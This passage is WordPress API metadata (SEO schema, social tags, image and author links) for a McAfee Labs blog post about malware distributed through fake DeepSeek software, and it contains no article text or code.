Users\",\"datePublished\":\"2025-03-17T07:00:41+00:00\",\"dateModified\":\"2025-03-17T20:57:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\"},\"wordCount\":2339,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"articleSection\":[\"Internet Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\",\"name\":\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"datePublished\":\"2025-03-17T07:00:41+00:00\",\"dateModified\":\"2025-03-17T20:57:34+00:00\",\"description\":\"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"width\":600,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Internet Security\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog","description":"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog","og_description":"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular","og_url":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2025-03-17T07:00:41+00:00","article_modified_time":"2025-03-17T20:57:34+00:00","og_image":[{"width":600,"height":400,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users","datePublished":"2025-03-17T07:00:41+00:00","dateModified":"2025-03-17T20:57:34+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/"},"wordCount":2339,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","articleSection":["Internet Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","name":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","datePublished":"2025-03-17T07:00:41+00:00","dateModified":"2025-03-17T20:57:34+00:00","description":"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","width":600,"height":400},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Internet Security","item":"https:\/\/www.mcafee.com\/blogs\/internet-security\/"},{"@type":"ListItem","position":3,"name":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/209804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=209804"}],"version-history":[{"count":14,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/209804\/revisions"}],"predecessor-version":[{"id":210786,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/209804\/revisions\/210786"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/210430"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=209804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=209804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=209804"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=209804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}